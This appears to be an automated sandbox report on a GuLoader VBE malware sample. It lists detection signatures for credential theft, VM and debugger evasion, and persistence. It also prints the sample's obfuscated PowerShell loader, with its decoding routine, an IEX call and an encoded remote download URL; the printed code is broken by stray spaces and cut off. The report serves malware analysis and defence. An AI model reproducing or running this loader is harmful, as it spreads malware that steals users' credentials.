Edit tour
Windows
Analysis Report
Inquiry Studbolt - 240703.vbe
Overview
General Information
Detection
GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Yara detected Powershell download and execute
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64native
- wscript.exe (PID: 9044 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Inqui ry Studbol t - 240703 .vbe" MD5: 0639B0A6F69B3265C1E42227D650B7D1) - powershell.exe (PID: 2680 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "cls;write 'Nugaciti es Komedia nter104 Pa latalise H ygiejnekom msionens R edesignati ng Ungrubb ed Fondsha ndler Fisk eflaaderne Discophil e Curarize Anmeldtes Refractin g Helleniz er Teknolo gipolitiks Generalst abskorts D ubitate Bl odfattighe ds Helcolo gy Cavilla tion Falle sen Alouat ta Vitial Unemptiabl e Datasikk erheds Nug acities Ko medianter1 04 Palatal ise Hygiej nekommsion ens Redesi gnating Un grubbed Fo ndshandler Fiskeflaa derne Disc ophile Cur arize Anme ldtes Refr acting Hel lenizer Te knologipol itiks Gene ralstabsko rts Dubita te Blodfat tigheds He lcology Ca villation Fallesen A louatta Vi tial Unemp tiable Dat asikkerhed s';If (${h ost}.Curre ntCulture) {$Smaasty kker++;}Fu nction Imm atrikulati onens($Mar ios){$Synt omy=$Mario s.Length-$ Smaastykke r;$Pronene sses='SUBs TRI';$Pron enesses+=' ng';For( $ Dipsomania cs=2;$Dips omaniacs - lt $Syntom y;$Dipsoma niacs+=3){ $Nugacitie s+=$Marios .$Pronenes ses.Invoke ( $Dipsoma niacs, $Sm aastykker) ;}$Nugacit ies;}funct ion Influe rende($Svi ppedes){ . ($Gn ier111) ($ Svippedes) ;}$Sclaffs =Immatriku lationens 'HuMN,oGaz HuiKal,elB eaDa/p,5La .Fr0Ru He( A WPuiCun UdKuo .wSl s l .N sTE p Li1 B0Fy .P,0.y;I. .eWCaiB,nS ,6Di4Te;Vi Bx,o6E.4, i;No BurUl vGl:Un1Co2 Sy1D.. U0 n)Sw IGSce V c.hkCyoN o/ C2Ch0cu 1tr0di0Ko1 Dr0Pe1Li A wF.ni drAr eOrfT.oSix Co/R 1 2Re 1 J.So0.a ';$Dissers =Immatriku lationens 'G U Es ne .r,e-IdA agEmeS,nSt tso ';$Red esignating =Immatriku lationens ' RhAft Ct BepS sKu:V a/ P/ .dat rUdiF,vOve Sa. UgTaoS ko,eg UlSo eCa.Syc Uo emVe/,euB ecKr?D,eCo xI,p Ko ,r StIn=,edI ro .wK.n.e l,roChagld .a&Fristd. e=Ac1N,T u TaX o3InpK aGRoV .QOm O Mu AYReu D.NOv0UnPM oVFifA.0s. S ,1PrvChu SaO,eoK.v, uPV,ZVacE 7Ar6PhtUd5 ';$Bourr e=Immatrik ulationens 's,>I ';$ Gnier111=I mmatrikula tionens 'F riSke Ix ';$Hoodwin ked='Fiske flaaderne' ;$Parastad es = Immat rikulation ens ' FeGa cF,h Fo,r .l%K.a epA lpSpdJiaOu tPeaU,%,l\ FrBMoe ol YlAteT rKi iPacUn7C.4 F.G,AB,f RsEk Fo&St &K, HeCyc DhKloCo U. t n ';Infl uerende (I mmatrikula tionens 'T i$ExgAllId oHubbea Kl sa: .CDehJ eaHecSpoCu n Nn FeGur Us J1 S7A ,2.v=Be(Ca cCamMadS S i/TucEx Co $P.PTwaSir Deas.s,ft AaAedReeKo sPe),r '); Influerend e (Immatri kulationen s 'Sn$S.g OlCuoFobTu anolL :KrH KoyBag .iD ieI,jUnnSk e uk Oo am VemEksMii oo .nUbeDe nUdsW,= T$ DeRJae.jd Ee .sBiiIn gOpn,saYat riSonFeg T.C.s.vpB. lGei StUn( Fa$ UB o A u.tr FrBye P.) ');In fluerende (Immatriku lationens ' T[ IN ie UrtPs.P S, beRer Iv . iTicReeDuP Plo iiAfno ,tLiMS,aLi n Ta hg Me KorDi]no:F i: SPre,gc S,uTir iUn t,eyAmPBrr Ceo etTroU scstoSvl E ,o= T I [ AnNDreUnt.